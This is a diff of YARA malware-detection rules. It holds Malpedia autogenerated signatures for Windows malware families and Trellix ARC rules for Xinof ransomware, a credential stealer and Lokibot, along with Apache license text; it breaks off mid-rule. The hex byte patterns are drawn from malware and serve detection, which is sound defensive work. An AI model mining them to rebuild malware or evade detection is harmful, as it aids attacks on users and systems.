MALPEDIA_Win_Turnedup_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7aa9a2c5-7064-5442-8638-24194df65bf5" + id = "317b79ff-9d3d-5ba0-8921-2dd0758e0502" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.murofet_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.turnedup_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "f1786a85d9dda8157fc7a7bca5587363f921b04e9ce6db23c0c6a6b000291064" + logic_hash = "41dd089d435e4495b4c527e58471affc57ceb5820e7069ad3a735daa64e32911" score = 75 quality = 75 tags = "FILE" @@ -186474,34 +189250,34 @@ rule MALPEDIA_Win_Murofet_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3c02 72e5 e8???????? a2???????? 84c0 7510 } - $sequence_1 = { 7504 3c02 72bf b001 } - $sequence_2 = { 3c02 72e5 e8???????? a2???????? } - $sequence_3 = { e8???????? e8???????? 3c02 72e5 e8???????? a2???????? 84c0 } - $sequence_4 = { 6a10 8d4624 55 50 ff15???????? 83c40c } - $sequence_5 = { c3 e8???????? 33c0 c20400 55 8bec 83ec68 } - $sequence_6 = { e8???????? 33c0 c20400 55 8bec 83ec68 53 } - $sequence_7 = { 6a10 8d4624 55 50 } - $sequence_8 = { 72e5 e8???????? a2???????? 84c0 7510 } - $sequence_9 = { ff15???????? c6443eff00 83f8ff 7509 56 } + $sequence_0 = { 8b4dfc 5f 5e 33cd 895004 5b } + $sequence_1 = { 7706 891d???????? ff0d???????? 7506 891d???????? 6a01 } + $sequence_2 = { 8b07 8b4004 03c7 33d2 8955dc c645e001 8b4838 } + $sequence_3 = { 895dfc 752b 6a00 8d4df8 e8???????? 833d????????00 } + $sequence_4 = { 68???????? 8819 e8???????? 8d7dac } + $sequence_5 = { c746180f000000 894614 56 884604 e8???????? 83c404 } + $sequence_6 = { 830801 8b4dd8 394dc0 741e 837dd000 } + $sequence_7 = { 8945bc 8975b0 8b55f4 8b45e0 83fa10 7303 8d45e0 } + $sequence_8 = { 8ad5 c0ea04 80e203 02d0 8a45f6 8855f8 8ad0 } + $sequence_9 = { 8b45bc 8a11 8810 8b0b 40 } condition: - 7 of them and filesize <622592 + 7 of them and filesize <892928 } -rule MALPEDIA_Win_Cloud_Duke_Auto : FILE +rule MALPEDIA_Win_Blister_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cde391f0-175a-570d-9bc3-d49da6ef8745" + id = "e15c5b26-46b1-50a6-b793-c24acb88c7d0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cloud_duke_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blister" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blister_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "74b144312fec28eba9f5a0427613a86e81c08ef3fe8c6af23e7d4ebef780ba1f" - score = 75 - quality = 75 + logic_hash = "2e7268df1a1003febf7615ed82849d5ba6785115864de7e2d3f4d8bf888a50fc" + score = 60 + quality = 25 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -186513,32 +189289,32 @@ rule MALPEDIA_Win_Cloud_Duke_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4c2448 e8???????? 50 8d8c240c010000 e8???????? 8d4c2448 e8???????? } - $sequence_1 = { 8d8c240c010000 e8???????? 8d4c2460 e8???????? } - $sequence_2 = { 83fe04 7ce3 8b45e8 4b 8ad4 } - $sequence_3 = { 8d8c24d8000000 e8???????? 51 8d442434 } - $sequence_4 = { 50 e8???????? 8b7c2440 46 3bf7 } - $sequence_5 = { eb0a 8b9dd8fbffff eb02 8bde 8b85e8fbffff 8d95e4fbffff 52 } - $sequence_6 = { 85c9 7438 83fa01 7533 83bedc00000008 8d86c8000000 7202 } - $sequence_7 = { 8d04450c000000 50 6a00 57 } - $sequence_8 = { eb02 8bce 8b5518 ff75fc 03d2 895510 } - $sequence_9 = { 6806020000 50 668984241c010000 8d84241e010000 50 c744245c00000000 e8???????? } + $sequence_0 = { 33f6 8d4447fe 8975fc 8945f8 3bfe 0f8447010000 } + $sequence_1 = { 57 ff75fc ffd6 85c0 7529 33c9 41 } + $sequence_2 = { e8???????? 8bf0 85f6 7c2e 6a04 58 8d4d08 } + $sequence_3 = { 8bff 55 8bec b8dc140000 e8???????? a1???????? 33c5 } + $sequence_4 = { 8b3d???????? 6870010000 684c040000 ff7604 ffd7 8b1d???????? } + $sequence_5 = { 8d45a0 50 ff750c c745a060000000 6891100000 ff36 } + $sequence_6 = { ff7604 ff75f4 ff75e8 6a02 ff75fc ff15???????? 85c0 } + $sequence_7 = { 8b4e28 8d45f8 50 895df8 e8???????? } + $sequence_8 = { ff15???????? 8bc8 0fb701 f7d8 1bc0 23c1 5e } + $sequence_9 = { 50 8b859cf7ffff 8b8c052cf7ffff e8???????? 8985a8f7ffff 85c0 0f8cf9010000 } condition: - 7 of them and filesize <368640 + 7 of them and filesize <1822720 } -rule MALPEDIA_Win_Nefilim_Auto : FILE +rule MALPEDIA_Win_Chir_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7c9bb815-6478-5f57-9a80-3013a8b5a537" + id = "18ccfa9f-30e1-5e52-b265-5cee479b1cb5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nefilim_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chir_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "0637c290ac474507dfbf7c46615faaf644551a1824ee3d111eec4b7aaf27ae12" + logic_hash = "3243cfbae6092a474cd7d4359f5703dd14295b3f14d9c12875310667b98d1cdf" score = 75 quality = 75 tags = "FILE" @@ -186552,32 +189328,32 @@ rule MALPEDIA_Win_Nefilim_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { be00010000 56 e8???????? 56 8944244c } - $sequence_1 = { 8945e4 3d00010000 7d10 8a8c181d010000 8888c0e64000 40 } - $sequence_2 = { c1f802 6bc003 50 6a00 ff15???????? 50 } - $sequence_3 = { 85c0 7506 ff15???????? 8d45d4 50 57 ffd3 } - $sequence_4 = { 397c2428 7304 8d442414 68???????? 50 ffd6 85c0 } - $sequence_5 = { 50 ffd6 85c0 0f84cf020000 f68424a000000010 8d8424cc000000 } - $sequence_6 = { 7421 68???????? 8d442444 e8???????? } - $sequence_7 = { 8b3d???????? 8b1d???????? 33c9 8945e4 894de8 8b45e4 d3e8 } - $sequence_8 = { 8944244c e8???????? ff74244c 8b542440 89442454 e8???????? } - $sequence_9 = { c745eceb7f4000 894df8 8945fc 64a100000000 8945e8 } + $sequence_0 = { 47 8811 3bf8 72e7 } + $sequence_1 = { 8d4c3df0 8a11 80f2fc 80c202 } + $sequence_2 = { e8???????? 48 59 8bcb 7419 } + $sequence_3 = { 5e 7419 8d4c35f8 8a11 80f2fc } + $sequence_4 = { 8d45f0 50 c745f021352432 c745f451173300 e8???????? 48 } + $sequence_5 = { c745f451173300 e8???????? 48 59 8bfb } + $sequence_6 = { 8d4c35f0 8a11 80f2fc 80c202 80f201 } + $sequence_7 = { 8a19 80f3fc 80c302 80f301 80c303 42 } + $sequence_8 = { 7415 8d4c15f8 8a01 34fc } + $sequence_9 = { 8a11 80f2fc 80c202 80f201 80c203 46 8811 } condition: - 7 of them and filesize <142336 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Xsplus_Auto : FILE +rule MALPEDIA_Win_Pteranodon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fb41ffbb-1e2d-5bdd-9365-c97018c55362" + id = "547312ac-3667-5c97-9fc9-daff4d88f305" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xsplus_auto.yar#L1-L178" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pteranodon_auto.yar#L1-L173" license_url = "N/A" - logic_hash = "1413c5b641befe4b985d097bf7fa94a2fd076afb28674d33f79669c0d9d8240e" + logic_hash = "5752ea7e57aaa9393a80bd68b7b77d472dc2c58ad73fb0c8d5639c2a359a3d60" score = 75 quality = 75 tags = "FILE" @@ -186591,2367 +189367,3098 @@ rule MALPEDIA_Win_Xsplus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b761c 8b4608 8b7e20 8b36 66394f18 75f2 } - $sequence_1 = { 0fb602 33c1 8b4d0c 034dfc 8801 } - $sequence_2 = { 83c408 8945f0 837df000 750f } - $sequence_3 = { e9???????? 8be5 5d c3 3b0d???????? } - $sequence_4 = { 8b45f4 83c001 8945f4 ebbf eb2c 6a08 8d4df8 } - $sequence_5 = { 895018 8b4df8 8b511c 83ea01 } - $sequence_6 = { c6864b01000043 c74668e0a34000 6a0d e8???????? 59 8365fc00 } - $sequence_7 = { 0345fc 8a08 880a c745f800000000 } - $sequence_8 = { 8d8df4fdffff 51 ff15???????? 8985ecfcffff 83bdecfcffffff 7565 6804010000 } - $sequence_9 = { 8b5118 d1e2 8b45f8 895018 8b4df8 } - $sequence_10 = { c745fc04000000 eb2d 8b5510 83e204 } - $sequence_11 = { 83c101 898de8feffff 8b550c 52 e8???????? } - $sequence_12 = { 8a800ca84000 08443b1d 0fb64601 47 3bf8 76ea } - $sequence_13 = { 8a15???????? 889500ffffff b93f000000 33c0 8dbd01ffffff f3ab 66ab } - $sequence_14 = { f3a5 8b45fc ffd0 5f 5e 8be5 } - $sequence_15 = { 8b4d08 51 ff15???????? b801000000 e9???????? 6a00 ff15???????? } - $sequence_16 = { 8975e0 8db120a84000 8975e4 eb2a 8a4601 } + $sequence_0 = { 394614 7320 51 50 8bce } + $sequence_1 = { 8d8dc0f8ffff e9???????? 8d8dc0f8ffff e9???????? 8d8dc0f8ffff e9???????? 8d8d08f9ffff } + $sequence_2 = { 59 83e03f 59 6bc838 8b04b5e0874300 03c1 } + $sequence_3 = { 8d45f0 50 ff15???????? 83f802 7541 8d4df0 e8???????? } + $sequence_4 = { 8b04f5b49b0210 5f 5e 5b 5d } + $sequence_5 = { ffd0 0fb7f0 8bcf 8b07 8b4008 ffd0 } + $sequence_6 = { c7869800000038c90210 c7460401000000 8b4dfc 5f 5e 33cd } + $sequence_7 = { 0f8490000000 53 6a00 56 e8???????? } + $sequence_8 = { 2bd0 d1fa 8d7902 668b01 83c102 } + $sequence_9 = { 8d8d78f8ffff c645fc1e e8???????? 8b851cf9ffff 83f810 7213 40 } + $sequence_10 = { 660f28aa802c4300 660f54e5 660f58fe 660f58fc 660f59c8 f20f59d8 } + $sequence_11 = { 3bc1 7419 85c0 b001 } + $sequence_12 = { 1bc0 23c1 83c008 5d c3 8b04c5849f4200 } + $sequence_13 = { c3 8b04c58cbf0210 5d c3 } + $sequence_14 = { c645fc0b 8d8df0f8ffff e8???????? 8d8d20f9ffff c645fc0c 03ce } + $sequence_15 = { 53 e8???????? 83c404 8945ec 53 8bd8 } + + condition: + 7 of them and filesize <499712 +} +/* + * YARA Rule Set + * Repository Name: Trellix ARC + * Repository: https://github.com/advanced-threat-research/Yara-Rules/ + * Retrieval Date: 2024-09-29 + * Git Commit: fc51a3fe3b450838614a5a5aa327c6bd8689cbb2 + * Number of Rules: 162 + * Skipped: 0 (age), 5 (quality), 0 (score), 0 (importance) + * + * + * LICENSE + * + * Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + + */ +private rule TRELLIX_ARC_Ransom_Xinof_Chunk_PRIVATE : RANSOMWARE +{ + meta: + description = "Detect chunk of Xinof ransomware" + author = "Thomas Roccia | McAfee ATR Team" + id = "243c39fd-b5f6-5f64-8058-43da182480c0" + date = "2020-11-20" + date = "2020-11-20" + modified = "2020-11-20" + reference = "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_xinof.yar#L1-L51" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "0c1e6299a2392239dbe7fead33ef4146" + logic_hash = "f0266962357a7cb26995cdbfcc99749b73fc4ed09c813fa8e2ed0f5143cde554" + score = 75 + quality = 70 + tags = "RANSOMWARE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom/XINOF" + actor_type = "Cybercrime" + actor_group = "FONIX" + + strings: + $chunk1 = { + C6 45 ?? ?? + 68 ?? ?? ?? ?? + 50 + E8 ?? ?? ?? ?? + 53 + 50 + 8D 85 ?? ?? ?? ?? + C6 45 ?? ?? + 50 + E8 ?? ?? ?? ?? + 56 + 50 + 8D 85 ?? ?? ?? ?? + C6 45 ?? ?? + 50 + E8 ?? ?? ?? ?? + 83 C4 ?? + C6 45 ?? ?? + 8B CC + 57 + 50 + 51 + E8 ?? ?? ?? ?? + 83 C4 ?? + 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? + 83 C4 ?? + 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? + } + + condition: + any of them +} +rule TRELLIX_ARC_STEALER_Credstealesy : STEALER +{ + meta: + description = "Generic Rule to detect the CredStealer Malware" + author = "IsecG – McAfee Labs" + id = "90e23ed8-3243-519b-8eb4-9db5902c73d3" + date = "2015-05-08" + modified = "2020-08-14" + reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/when-hackers-get-hacked-the-malware-servers-of-a-data-stealing-campaign/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/stealer/STEALER_credstealer.yar#L1-L24" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "3d007fc0d2e2eb3d8f0c2b86dd01ede482e72f6c67fd6d284d77c47b53021b3c" + score = 75 + quality = 70 + tags = "STEALER" + rule_version = "v1" + malware_type = "stealer" + malware_family = "Stealer:W32/CredStealer" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $my_hex_string = "CurrentControlSet\\Control\\Keyboard Layouts\\" wide + $my_hex_string2 = {89 45 E8 3B 7D E8 7C 0F 8B 45 E8 05 FF 00 00 00 2B C7 89 45 E8} + + condition: + $my_hex_string and $my_hex_string2 +} +rule TRELLIX_ARC_STEALER_Lokibot : STEALER FILE +{ + meta: + description = "Rule to detect Lokibot stealer" + author = "Marc Rivero | McAfee ATR Team" + id = "75f502a3-2d9f-5ccf-93f8-2d6a73e9e1b7" + date = "2020-09-23" + modified = "2020-09-25" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/stealer/STEALER_Lokibot.yar#L1-L39" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "999a69394a545f726cf15e4361e0dfc17eeac6544e6816a0ad140316e9642510" + score = 75 + quality = 70 + tags = "STEALER, FILE" + rule_version = "v1" + malware_type = "stealer" + malware_family = "Ransomware:W32/Lokibot" + actor_type = "Cybercrime" + actor_group = "Unknown" + hash1 = "0e40f4fdd77e1f90279c585cfc787942b8474e5216ff4d324d952ef6b74f25d2" + hash2 = "3ad36afad12d8cf245904285c21a8db43f9ed9c82304fdc2f27c4dd1438e4a1d" + hash3 = "26fbdd516b3c1bfa36784ef35d6bc216baeb0ef2d0c0ba036ff9296da2ce2c84" + + strings: + $sq1 = { 55 8B EC 56 8B 75 08 57 56 E8 ?? ?? ?? ?? 8B F8 59 85 FF 75 04 33 C0 EB 20 56 6A 00 57 E8 ?? ?? ?? ?? 6A 0C E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 E5 83 60 08 00 89 38 89 70 04 5F 5E 5D C3 } + $sq2 = { 55 8B EC 83 EC 0C 53 56 57 33 DB BE ?? ?? ?? ?? 53 53 56 6A 09 E8 ?? ?? ?? ?? 6A 10 6A 01 53 53 8D 4D F8 51 FF D0 53 53 56 6A 09 E8 ?? ?? ?? ?? 6A 08 6A 01 53 53 8D 4D F8 51 FF D0 85 C0 0F 84 2B 01 00 00 6A 24 E8 ?? ?? ?? ?? 59 8B D8 33 C0 6A 09 59 8B FB F3 AB 66 8B 4D 24 B8 03 66 00 00 C7 03 08 02 00 00 66 85 C9 74 03 0F B7 C1 8B 4D 08 33 D2 0F B7 C0 89 43 04 89 53 08 85 C9 74 12 C7 43 08 08 00 00 00 8B 01 89 43 0C 8B 41 04 89 43 10 8B 4D 0C 85 C9 74 0F 83 43 08 08 8B 01 89 43 14 8B 41 04 89 43 18 8B 4D 10 85 C9 74 0F 83 43 08 08 8B 01 89 43 1C 8B 41 04 89 43 20 8B 7B 08 8B 75 F8 83 C7 0C 52 52 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 8D 4D FC 51 6A 00 6A 00 57 53 56 FF D0 85 C0 74 75 8B 75 FC 33 C0 40 83 7D 20 00 0F 45 45 20 33 FF 57 57 68 ?? ?? ?? ?? 6A 09 89 45 F4 E8 ?? ?? ?? ?? 57 8D 4D F4 51 6A 04 56 FF D0 85 C0 74 3B 39 7D 14 74 1A 8B 75 FC 57 57 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 57 FF 75 14 6A 01 56 FF D0 8B 55 18 8B 4D FC 53 89 0A 8B 55 1C 8B 4D F8 89 0A E8 ?? ?? ?? ?? 33 C0 59 40 EB 21 FF 75 FC E8 BF FB FF FF 59 EB 02 33 FF 53 E8 ?? ?? ?? ?? 57 FF 75 F8 E8 6B FB FF FF 83 C4 0C 33 C0 5F 5E 5B 8B E5 5D C3 } + $sq3 = { 55 8B EC 83 EC 0C 53 8B 5D 0C 56 57 6A 10 33 F6 89 75 F8 89 75 FC 58 89 45 F4 85 DB 75 0E FF 75 08 E8 ?? ?? ?? ?? 8B D8 8B 45 F4 59 50 E8 ?? ?? ?? ?? 8B F8 59 85 FF 0F 84 B6 00 00 00 FF 75 F4 56 57 E8 C4 ?? ?? ?? 83 C4 0C 56 56 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 68 00 00 00 F0 6A 01 56 56 8D 4D F8 51 FF D0 85 C0 0F 84 84 00 00 00 8B 75 F8 6A 00 6A 00 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 8D 4D FC 51 6A 00 6A 00 68 03 80 00 00 56 FF D0 85 C0 74 51 6A 00 53 FF 75 08 FF 75 FC E8 7F FD FF FF 83 C4 10 85 C0 74 3C 8B 75 FC 6A 00 6A 00 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 6A 00 8D 4D F4 51 57 6A 02 56 FF D0 85 C0 74 19 FF 75 FC E8 16 FD FF FF 6A 00 FF 75 F8 E8 26 FD FF FF 83 C4 0C 8B C7 EB 0E 6A 00 FF 75 F8 E8 15 FD FF FF 59 59 33 C0 5F 5E 5B 8B E5 5D C3 } + $sq4 = { 55 8B EC 83 7D 10 00 56 57 8B 7D 0C 57 74 0E E8 ?? ?? ?? ?? 8B F0 33 C0 03 F6 40 EB 09 E8 ?? ?? ?? ?? 8B F0 33 C0 83 7D 14 00 59 75 24 50 FF 75 08 E8 2C 00 00 00 59 59 83 F8 01 74 04 33 C0 EB 1D 56 FF 75 08 E8 C5 FE FF FF 59 59 83 F8 01 75 EC 56 57 FF 75 08 E8 CA FE FF FF 83 C4 0C 5F 5E 5D C3 } + $sq5 = { 55 8B EC 53 56 8B 75 0C 57 85 F6 75 0B FF 75 08 E8 ?? ?? ?? ?? 59 8B F0 6B C6 03 89 45 0C 8D 58 01 53 E8 ?? ?? ?? ?? 8B F8 59 85 FF 74 42 53 6A 00 57 E8 ?? ?? ?? ?? 83 C4 0C 33 D2 85 F6 74 27 8B 45 08 0F B6 0C 02 8B C1 83 E1 0F C1 E8 04 8A 80 ?? ?? ?? ?? 88 04 57 8A 81 ?? ?? ?? ?? 88 44 57 01 42 3B D6 72 D9 8B 45 0C C6 04 07 00 8B C7 5F 5E 5B 5D C3 } + $sq6 = { 55 8B EC 53 56 57 FF 75 08 E8 ?? ?? ?? ?? 33 C9 6A 02 5B 8D B8 A0 1F 00 00 8B C7 F7 E3 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 74 6F 8D 0C 3F 51 6A 00 56 E8 ?? ?? ?? ?? 8D 45 0C 50 FF 75 08 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 1C 85 FF 74 40 33 C9 8D 47 02 F7 E3 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B D8 59 85 DB 74 25 8D 0C 7D 02 00 00 00 51 6A 00 53 E8 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 1C 8B C3 EB 09 56 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5B 5D C3 } + $sq7 = { 55 8B EC 81 EC 80 00 00 00 56 57 E8 ?? ?? ?? ?? 6A 1F 59 BE ?? ?? ?? ?? 8D 7D 80 F3 A5 33 C9 6A 02 5A 66 A5 8B 7D 08 8D 47 01 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B F0 59 85 F6 74 4D 8D 04 7D 02 00 00 00 4F 89 45 08 53 50 6A 00 56 E8 ?? ?? ?? ?? 83 C4 0C 33 DB 85 FF 74 1C E8 ?? ?? ?? ?? 33 D2 6A 7E 59 F7 F1 D1 EA 66 8B 44 55 80 